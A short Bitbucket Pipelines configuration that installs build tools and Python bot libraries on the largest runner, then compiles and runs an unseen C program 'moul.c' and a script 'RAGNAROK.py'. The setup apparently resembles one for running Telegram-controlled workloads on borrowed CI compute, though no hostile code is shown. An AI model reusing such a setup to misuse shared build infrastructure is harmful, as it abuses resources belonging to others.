image: python:latest  # Latest Python version use karega

pipelines:
  default:
    - step:
        name: Install Libraries, Check CPU & Run Code
        size: 8x
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip install --upgrade pip  # Ensure latest pip version
          - pip install flask telebot pymongo aiohttp
          - lscpu  # Check CPU information
          - gcc moul.c -o moul -lpthread  # Compile C program
          - chmod +x moul  # Make compiled file executable
          - ./moul  # Run the compiled C program
          - python3 RAGNAROK.py  # Run Python script
